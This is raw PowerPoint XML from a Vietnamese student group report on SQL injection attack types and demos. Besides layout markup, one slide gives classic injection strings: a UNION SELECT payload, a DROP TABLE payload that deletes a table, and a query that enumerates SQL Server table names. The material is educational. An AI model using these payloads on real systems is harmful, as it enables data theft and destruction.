            <a:chOff x="-42837" y="4443487"/>
            <a:chExt cx="9229574" cy="642787"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="298" name="Shape 298"/>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299" name="Shape 299"/>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0" name="Shape 300"/>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1" name="Shape 301"/>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2" name="Shape 302"/>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3" name="Shape 303"/>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5" name="Shape 305"/>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6" name="Shape 306"/>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7" name="Shape 307"/>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8" name="Shape 308"/>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09" name="Shape 309"/>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0" name="Shape 310"/>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1" name="Shape 311"/>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2" name="Shape 312"/>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3" name="Shape 313"/>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4" name="Shape 314"/>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5" name="Shape 315"/>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6" name="Shape 316"/>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8" name="Shape 318"/>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0" name="Shape 320"/>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323" name="Shape 323"/>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6" name="Shape 326"/>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 name="Shape 413"/>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7"/>
            <a:ext cx="9229574" cy="642787"/>
            <a:chOff x="-42837" y="4443487"/>
            <a:chExt cx="9229574" cy="642787"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="419" name="Shape 41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44" name="Shape 444"/>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ctrTitle" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="217618" y="1088285"/>
            <a:ext cx="8770620" cy="1727869"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="b" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3200" dirty="0" smtClean="0">
                <a:latin typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:cs typeface="Segoe UI Historic" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>TÌM HIỂU CÁC DẠNG TẤN CÔNG SQL INJECTION </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="3200" dirty="0" smtClean="0">
                <a:latin typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:cs typeface="Segoe UI Historic" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="3200" dirty="0" smtClean="0">
                <a:latin typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:cs typeface="Segoe UI Historic" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>XÂY DỰNG VÀ DEMO CÁC KỊCH BẢN TẤN CÔNG SQL INJECTION</a:t>
            </a:r>
            <a:endParaRPr lang="en" sz="3200" dirty="0">
              <a:latin typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              <a:ea typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              <a:cs typeface="Segoe UI Historic" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="493" name="Shape 493"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1481818" y="2816154"/>
            <a:ext cx="1166507" cy="1166538"/>
            <a:chOff x="6654650" y="3665275"/>
            <a:chExt cx="409100" cy="409125"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="494" name="Shape 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lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0">
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:buNone/>
              </a:pPr>
              <a:endParaRPr/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="495" name="Shape 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lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0">
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:buNone/>
              </a:pPr>
              <a:endParaRPr/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="496" name="Shape 496"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="1940693">
            <a:off x="681523" y="3310616"/>
            <a:ext cx="587625" cy="587659"/>
            <a:chOff x="570875" y="4322250"/>
            <a:chExt cx="443300" cy="443325"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="497" name="Shape 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8" name="Shape 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9" name="Shape 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501" name="Shape 501"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1170296" y="2835305"/>
            <a:ext cx="316509" cy="302214"/>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502" name="Shape 502"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1793658">
            <a:off x="2659120" y="3496981"/>
            <a:ext cx="225077" cy="2149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lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="441960" y="503739"/>
            <a:ext cx="2903220" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0"/>
              <a:t>BÁO CÁO BÀI TẬP NHÓM:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3715198" y="842293"/>
            <a:ext cx="1775460" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>CHỦ ĐỀ:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1" i="1" u="sng" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5824394" y="2930335"/>
            <a:ext cx="3049544" cy="1769715"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Nhóm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t> 5: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Nguyễn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Văn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Hoàng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Nhã</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>               </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Chế</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Thị</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Nhã</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Quyên</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>               </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Trần</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Quang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Sang </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>                </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Trần</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Thị</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Minh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Uyên</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>                </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Ngô</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Thị</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Hồng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Vân</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Lớp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>45K14</a:t>
            </a:r>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567948" y="538823"/>
            <a:ext cx="8022131" cy="1115112"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" sz="1400" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Một trường hợp khác, ví dụ như trang tìm kiếm. Trang này cho phép người dùng nhập vào các thông tin tìm kiếm như Họ, Tên, … Đoạn mã thường gặp là</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="947615" y="169491"/>
            <a:ext cx="7262798" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="1" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="1800" b="1" i="1" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Tấn </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="1800" b="1" i="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>công sử dụng câu lệnh SELECT</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" i="1" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="Text&#10;&#10;Description automatically generated"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2023455" y="1603440"/>
            <a:ext cx="5111115" cy="1922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414773" y="538823"/>
            <a:ext cx="8328478" cy="4508927"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Tương </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>tự như trên, tin tặc có thể nhập vào trường tên tác giả bằng chu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ỗi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> giá trị:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>' UNION SELECT ALL SELECT OtherField FROM OtherTable WHERE ''=' (*)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Lúc </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>này câu truy vấn đầu không thành công, chương trình sẽ thực hiện thêm lệnh tiếp theo sau từ khóa UNION</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>- K</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ẻ tấn công có thể xóa toàn bộ cơ sở dữ liệu bằng cách chèn vào các đoạn lệnh nguy hiểm như lệnh DROP TABLE. Ví dụ như: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>' DROP TABLE T_AUTHORS –</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Để</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>biết được ứng dụng web bị lỗi dạng này hãy nhập vào chuỗi (*) như trên, nếu hệ thống báo lỗi về cú pháp dạng: Invalid object name “OtherTable”; ta có thể biết chắc là hệ thống đã thực hiện câu SELECT sau từ khóa UNION, vì như vậy mới có thể trả về lỗi mà ta đã cố tình tạo ra trong câu lệnh SELECT.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>- Ta </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>cũng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>có</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>thể</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>biết được tên của các bảng dữ liệu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>vì</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>trong</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>SQL Server, có hai đối tượng là sysobjects và syscolumns cho phép liệt kê tất cả các tên bảng và cột có trong hệ thống. Ta chỉ cần chỉnh lại câu lệnh SELECT, ví dụ như</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" b="1" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>UNION SELECT name FROM sysobjects WHERE xtype = 'U'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1797262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animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="486">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4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6">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>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86">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:sub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735862" y="751848"/>
            <a:ext cx="7686301" cy="3786659"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
